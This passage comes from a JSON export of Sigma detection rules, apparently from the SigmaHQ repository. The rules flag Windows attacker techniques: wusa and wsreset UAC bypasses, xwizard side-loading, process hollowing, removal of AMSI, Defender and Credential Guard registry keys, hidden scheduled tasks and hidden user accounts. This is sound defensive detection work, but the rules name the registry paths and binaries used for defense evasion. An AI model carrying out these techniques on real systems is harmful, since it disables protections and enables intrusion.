    "content": "title: Wusa.EXE Executed By Parent Process Located In Suspicious Location\nid: ef64fc9c-a45e-43cc-8fd8-7d75d73b4c99\nstatus: test\ndescription: |\n    Detects execution of the \"wusa.exe\" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.\n    Attackers could instantiate an instance of \"wusa.exe\" in order to bypass User Account Control (UAC). They can duplicate the access token from \"wusa.exe\" to gain elevated privileges.\nreferences:\n    - https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document\nauthor: X__Junior (Nextron Systems)\ndate: 2023-11-26\nmodified: 2024-08-15\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\wusa.exe'\n    selection_paths_1:\n        ParentImage|contains:\n            # Note: Add additional suspicious locations to increase coverage\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\Appdata\\Local\\Temp\\'\n            - '\\Temporary Internet'\n    selection_paths_2:\n        - ParentImage|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - ParentImage|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - ParentImage|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - ParentImage|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    filter_main_msu:\n        # Note: We exclude MSU extension files. A better approach is to baseline installation of updates in your env to avoid false negatives.\n        CommandLine|contains: '.msu'\n    condition: selection_img and 1 of selection_paths_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_xwizard_execution_non_default_location.yml",
    "content": "title: Xwizard.EXE Execution From Non-Default Location\nid: 193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1\nstatus: test\ndescription: |\n    Detects the execution of Xwizard tool from a non-default directory.\n    When executed from a non-default directory, this utility can be abused in order to side load a custom version of \"xwizards.dll\".\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/\n    - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-09-20\nmodified: 2024-08-15\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\xwizard.exe'\n        - OriginalFileName: 'xwizard.exe'\n    filter_main_legit_location:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Windows installed on non-C drive\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_xwizard_runwizard_com_object_exec.yml",
    "content": "title: COM Object Execution via Xwizard.EXE\nid: 53d4bb30-3f36-4e8a-b078-69d36c4a79ff\nstatus: test\ndescription: |\n    Detects the execution of Xwizard tool with the \"RunWizard\" flag and a GUID like argument.\n    This utility can be abused in order to run custom COM object created in the registry.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/\n    - https://www.elastic.co/guide/en/security/current/execution-of-com-object-via-xwizard.html\n    - https://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/\nauthor: Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-10-07\nmodified: 2024-08-15\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine: 'RunWizard'\n        CommandLine|re: '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_tampering/proc_tampering_susp_process_hollowing.yml",
    "content": "title: Potential Process Hollowing Activity\nid: c4b890e5-8d8c-4496-8c66-c805753817cd\nstatus: test\ndescription: Detects when a memory process image does not match the disk image, indicative of process hollowing.\nreferences:\n    - https://twitter.com/SecurePeacock/status/1486054048390332423?s=20\n    - https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/\nauthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S\ndate: 2022-01-25\nmodified: 2023-11-28\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055.012\nlogsource:\n    product: windows\n    category: process_tampering\ndetection:\n    selection:\n        Type: 'Image is replaced'\n    filter_main_generic:\n        Image|contains:\n            - ':\\Program Files (x86)'\n            - ':\\Program Files\\'\n            - ':\\Windows\\System32\\wbem\\WMIADAP.exe'\n            - ':\\Windows\\SysWOW64\\wbem\\WMIADAP.exe'\n    filter_optional_opera:\n        Image|contains: '\\AppData\\Local\\Programs\\Opera\\'\n        Image|endswith: '\\opera.exe'\n    filter_optional_edge:\n        Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml",
    "content": "title: Potential Defense Evasion Via Raw Disk Access By Uncommon Tools\nid: db809f10-56ce-4420-8c86-d6a7d793c79c\nstatus: test\ndescription: Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019-10-22\nmodified: 2025-12-03\ntags:\n    - attack.defense-evasion\n    - attack.t1006\nlogsource:\n    product: windows\n    category: raw_access_thread\ndetection:\n    filter_main_floppy:\n        Device|contains: floppy\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\$WINDOWS.~BT\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\CCM\\'\n            - 'C:\\Windows\\explorer.exe'\n            - 'C:\\Windows\\servicing\\'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SystemApps\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\uus\\'\n            - 'C:\\Windows\\WinSxS\\'\n    filter_main_system_images:\n        Image:\n            - 'Registry'\n            - 'System'\n    filter_main_windefender:\n        Image|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        Image|endswith:\n            - '\\MsMpEng.exe'\n            - '\\MpDefenderCoreService.exe'\n    filter_main_microsoft_appdata:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains|all:\n            - '\\AppData\\'\n            - '\\Microsoft\\'\n    filter_main_ssd_nvme:\n        Image|startswith: 'C:\\Windows\\Temp\\'\n        Image|endswith:\n            - '\\Executables\\SSDUpdate.exe'\n            - '\\HostMetadata\\NVMEHostmetadata.exe'\n    filter_main_null:\n        Image: null\n    filter_main_systemsettings:\n        Image: 'C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n    filter_main_update:\n        Image|startswith: 'C:\\$WinREAgent\\Scratch\\'\n    filter_optional_github_desktop:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\GitHubDesktop\\app-'\n        Image|endswith: '\\resources\\app\\git\\mingw64\\bin\\git.exe'\n    filter_optional_nextron:\n        Image|startswith: 'C:\\Windows\\Temp\\asgard2-agent\\'\n        Image|endswith: '\\thor.exe'\n    filter_optional_Keybase:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Keybase\\upd.exe'\n    condition: not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml",
    "content": "title: Potential Persistence Via Disk Cleanup Handler - Registry\nid: d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a\nstatus: test\ndescription: |\n    Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\n    The disk cleanup manager is part of the operating system. It displays the dialog box […]\n    The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\n    Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\n    Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\n    Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\nreferences:\n    - https://persistence-info.github.io/Data/diskcleanuphandler.html\n    - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-02-07\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    category: registry_add\ndetection:\n    selection:\n        EventType: CreateKey\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches\\'\n    filter_main_default_keys:\n        # Default Keys\n        TargetObject|endswith:\n            - '\\Active Setup Temp Folders'\n            - '\\BranchCache'\n            - '\\Content Indexer Cleaner'\n            - '\\D3D Shader Cache'\n            - '\\Delivery Optimization Files'\n            - '\\Device Driver Packages'\n            - '\\Diagnostic Data Viewer database files'\n            - '\\Downloaded Program Files'\n            - '\\DownloadsFolder'\n            - '\\Feedback Hub Archive log files'\n            - '\\Internet Cache Files'\n            - '\\Language Pack'\n            - '\\Microsoft Office Temp Files'\n            - '\\Offline Pages Files'\n            - '\\Old ChkDsk Files'\n            - '\\Previous Installations'\n            - '\\Recycle Bin'\n            - '\\RetailDemo Offline Content'\n            - '\\Setup Log Files'\n            - '\\System error memory dump files'\n            - '\\System error minidump files'\n            - '\\Temporary Files'\n            - '\\Temporary Setup Files'\n            - '\\Temporary Sync Files'\n            - '\\Thumbnail Cache'\n            - '\\Update Cleanup'\n            - '\\Upgrade Discarded Files'\n            - '\\User file versions'\n            - '\\Windows Defender'\n            - '\\Windows Error Reporting Files'\n            - '\\Windows ESD installation files'\n            - '\\Windows Upgrade Log Files'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate new entry added by windows\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_defender_context_menu.yml",
    "content": "title: Delete Defender Scan ShellEx Context Menu Registry Key\nid: 72a0369a-2576-4aaf-bfc9-6bb24a574ac6\nrelated:\n    - id: b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b\n      type: similar\nstatus: experimental\ndescription: Detects deletion of registry key that adds 'Scan with Defender' option in context menu. Attackers may use this to make it harder for users to scan files that are suspicious.\nreferences:\n    - https://research.splunk.com/endpoint/395ed5fe-ad13-4366-9405-a228427bdd91/\n    - https://winaero.com/how-to-delete-scan-with-windows-defender-from-context-menu-in-windows-10/\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n    - https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat/\nauthor: 'Matt Anderson (Huntress)'\ndate: 2025-07-11\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_delete\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'shellex\\ContextMenuHandlers\\EPP'\n    filter_main_defender:\n        Image|startswith:\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\Program Files (x86)\\Windows Defender\\'\n        Image|endswith: '\\MsMpEng.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely as this weakens defenses and normally would not be done even if using another AV.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_disable_credential_guard.yml",
    "content": "title: Windows Credential Guard Related Registry Value Deleted - Registry\nid: d645ef86-2396-48a1-a2b6-b629ca3f57ff\nrelated:\n    - id: c17d47b7-dcd6-4109-87eb-d1817bd4cbc9\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to disable Windows Credential Guard by deleting registry values. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them.\n    Adversaries may disable Credential Guard to gain access to sensitive credentials stored in the system, such as NTLM hashes and Kerberos tickets, which can be used for lateral movement and privilege escalation.\nreferences:\n    - https://github.com/DambergC/SaveFolder/blob/90e945eba80fae85f2d54b4616e05a44ec90c500/Cygate%20Installation%20tool%206.22/Script/OSD/OSDeployment-CredentialGuardDisable.ps1#L50\n    - https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/configure\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-12-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_delete\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\DeviceGuard\\EnableVirtualizationBasedSecurity'\n            - '\\DeviceGuard\\LsaCfgFlags'\n            - '\\DeviceGuard\\RequirePlatformSecurityFeatures'\n            - '\\Lsa\\LsaCfgFlags'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_disable_credential_guard/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_enable_windows_recall.yml",
    "content": "title: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted\nid: 5dfc1465-8f65-4fde-8eb5-6194380c6a62\nrelated:\n    - id: 75180c5f-4ea1-461a-a4f6-6e4700c065d4\n      type: similar\n    - id: 817f252c-5143-4dae-b418-48c3e9f63728\n      type: similar\nstatus: test\ndescription: |\n    Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing \"DisableAIDataAnalysis\" registry value.\n    Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\n    This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/client-management/manage-recall\n    - https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis\nauthor: Sajid Nawaz Khan\ndate: 2024-06-02\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    category: registry_delete\n    product: windows\ndetection:\n    selection:\n        # HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis\n        # HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis\n        EventType: DeleteValue\n        TargetObject|endswith: '\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis'\n    condition: selection\nfalsepositives:\n    - Legitimate use/activation of Windows Recall\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml",
    "content": "title: Folder Removed From Exploit Guard ProtectedFolders List - Registry\nid: 272e55a4-9e6b-4211-acb6-78f51f0b1b40\nstatus: test\ndescription: Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder\nreferences:\n    - https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\nmodified: 2023-02-08\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_delete\n    product: windows\ndetection:\n    selection:\n        EventType: DeleteValue\n        TargetObject|contains: 'SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\ProtectedFolders'\n    condition: selection\nfalsepositives:\n    - Legitimate administrators removing applications (should always be investigated)\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml",
    "content": "title: Terminal Server Client Connection History Cleared - Registry\nid: 07bdd2f5-9c58-4f38-aec8-e101bb79ef8d\nstatus: test\ndescription: Detects the deletion of registry keys containing the MSTSC connection history\nreferences:\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer\n    - http://woshub.com/how-to-clear-rdp-connections-history/\n    - https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-10-19\nmodified: 2023-02-08\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1070\n    - attack.t1112\nlogsource:\n    category: registry_delete\n    product: windows\ndetection:\n    selection1:\n        EventType: DeleteValue\n        TargetObject|contains: '\\Microsoft\\Terminal Server Client\\Default\\MRU'\n    selection2:\n        EventType: DeleteKey\n        TargetObject|contains: '\\Microsoft\\Terminal Server Client\\Servers\\'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml",
    "content": "title: Removal Of AMSI Provider Registry Keys\nid: 41d1058a-aea7-4952-9293-29eaaf516465\nstatus: test\ndescription: Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://seclists.org/fulldisclosure/2020/Mar/45\nauthor: frack113\ndate: 2021-06-07\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_delete\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '{2781761E-28E0-4109-99FE-B9D127C57AFE}' # IOfficeAntiVirus\n            - '{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' # ProtectionManagement.dll\n    filter_main_defender:\n        Image|startswith:\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\Program Files (x86)\\Windows Defender\\'\n        Image|endswith: '\\MsMpEng.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: AMSI Bypass - Remove AMSI Provider Reg Key\n      technique: T1562.001\n      atomic_guid: 13f09b91-c953-438e-845b-b585e51cac9b\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml",
    "content": "title: Removal of Potential COM Hijacking Registry Keys\nid: 96f697b0-b499-4e5d-9908-a67bec11cdb6\nstatus: test\ndescription: |\n    Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\n    These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/7\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md\n    - https://learn.microsoft.com/en-us/windows/win32/shell/launch\n    - https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand\n    - https://learn.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2025-10-07\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_delete\ndetection:\n    selection:\n        TargetObject|endswith: '\\shell\\open\\command'\n    filter_main_explorer:\n        Image|endswith: 'C:\\Windows\\explorer.exe'\n    filter_main_svchost:\n        Image: 'C:\\Windows\\system32\\svchost.exe'\n    filter_main_msiexec:\n        Image:\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n    filter_main_generic_prorams:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    filter_main_openwith:\n        Image: 'C:\\Windows\\System32\\OpenWith.exe'\n    filter_optional_dropbox:\n        Image|endswith: '\\Dropbox.exe'\n        # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)\n        TargetObject|contains: '\\Dropbox.'\n    filter_optional_wireshark:\n        Image|endswith: '\\AppData\\Local\\Temp\\Wireshark_uninstaller.exe'\n        # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)\n        TargetObject|contains: '\\wireshark-capture-file\\'\n    filter_optional_peazip:\n        Image|contains: 'peazip'\n        # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)\n        TargetObject|contains: '\\PeaZip.'\n    filter_optional_everything:\n        Image|endswith: '\\Everything.exe'\n        # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)\n        TargetObject|contains: '\\Everything.'\n    filter_optional_uninstallers:\n        # This image path is linked with different uninstallers when running as admin unfortunately\n        Image|startswith: 'C:\\Windows\\Installer\\MSI'\n    filter_optional_java:\n        Image|startswith: 'C:\\Program Files (x86)\\Java\\'\n        Image|endswith: '\\installer.exe'\n        TargetObject|contains: '\\Classes\\WOW6432Node\\CLSID\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}'\n    filter_optional_edgeupdate:\n        Image|contains: '\\Microsoft\\EdgeUpdate\\Install'\n    filter_optional_avira:\n        Image:\n            - 'C:\\Program Files (x86)\\Avira\\Antivirus\\'\n            - 'C:\\Program Files\\Avira\\Antivirus\\'\n        TargetObject|endswith:\n            - '\\CLSID\\{305CA226-D286-468e-B848-2B2E8E697B74}\\Shell\\Open\\Command'\n            - '\\AntiVir.Keyfile\\shell\\open\\command'\n    filter_optional_installer_temp:\n        - Image|contains|all:\n              - 'AppData\\Local\\Temp'\n              - '\\setup.exe'\n        - Image|contains|all:\n              - '\\Temp\\is-'\n              - '\\target.tmp'\n    filter_optional_ninite:\n        Image|endswith: '\\ninite.exe'\n    filter_optional_discord:\n        Image|endswith: '\\reg.exe'\n        TargetObject|endswith: '\\Discord\\shell\\open\\command'\n    filter_optional_spotify:\n        Image|endswith: '\\Spotify.exe'\n        TargetObject|endswith: '\\Spotify\\shell\\open\\command'\n    filter_optional_eclipse:\n        Image|endswith: 'C:\\eclipse\\eclipse.exe'\n        TargetObject|contains: '_Classes\\eclipse+'\n    filter_optional_teamviewer:\n        Image|contains|all:\n            - '\\Temp'\n            - '\\TeamViewer'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software (un)installations are known to cause false positives. Please add them as a filter when encountered\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_runmru.yml",
    "content": "title: RunMRU Registry Key Deletion - Registry\nid: 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55\nrelated:\n    - id: c11aecef-9c37-45a6-9c07-bc0782f963fd\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog.\n    In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.\n    Adversaries may delete this key to cover their tracks after executing commands.\nreferences:\n    - https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\nlogsource:\n    category: registry_delete\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml",
    "content": "title: Removal Of Index Value to Hide Schedule Task - Registry\nid: 526cc8bc-1cdc-48ad-8b26-f19bff969cec\nrelated:\n    - id: acd74772-5f88-45c7-956b-6a7b36c294d2\n      type: similar\n    - id: 5b16df71-8615-4f7f-ac9b-6c43c0509e61\n      type: similar\nstatus: test\ndescription: Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"\nreferences:\n    - https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-26\nmodified: 2025-10-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: windows\n    category: registry_delete\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\'\n            - 'Index'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml",
    "content": "title: Removal Of SD Value to Hide Schedule Task - Registry\nid: acd74772-5f88-45c7-956b-6a7b36c294d2\nrelated:\n    - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec\n      type: similar\nstatus: test\ndescription: Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware\nreferences:\n    - https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/\nauthor: Sittikorn S\ndate: 2022-04-15\nmodified: 2025-10-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: windows\n    category: registry_delete\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\'\n            - 'SD'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml",
    "content": "title: Creation of a Local Hidden User Account by Registry\nid: 460479f3-80b7-42da-9c43-2cc1d54dbccd\nstatus: test\ndescription: Sysmon registry detection of a local hidden user account.\nreferences:\n    - https://twitter.com/SBousseaden/status/1387530414185664538\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-05-03\nmodified: 2025-10-31\ntags:\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        TargetObject|contains: '\\SAM\\SAM\\Domains\\Account\\Users\\Names\\'\n        TargetObject|endswith: '$\\(Default)'\n        Image|endswith: '\\lsass.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Create Hidden User in Registry\n      technique: T1564.002\n      atomic_guid: 173126b7-afe4-45eb-8680-fa9f6400431c\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml",
    "content": "title: UAC Bypass Via Wsreset\nid: 6ea3bf32-9680-422d-9f50-e90716b12a66\nstatus: test\ndescription: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly\n    - https://lolbas-project.github.io/lolbas/Binaries/Wsreset\nauthor: oscd.community, Dmitry Uchakin\ndate: 2020-10-07\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml",
    "content": "title: CMSTP Execution Registry Event\nid: b6d235fc-1d38-4b12-adbe-325f06728f37\nstatus: stable\ndescription: Detects various indicators of Microsoft Connection Manager Profile Installer execution\nreferences:\n    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/\nauthor: Nik Seetharaman\ndate: 2018-07-16\nmodified: 2020-12-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.003\n    - attack.g0069\n    - car.2019-04-001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\cmmgr32.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate CMSTP use (unlikely in modern enterprise environments)\nlevel: high\n"
  },
  {
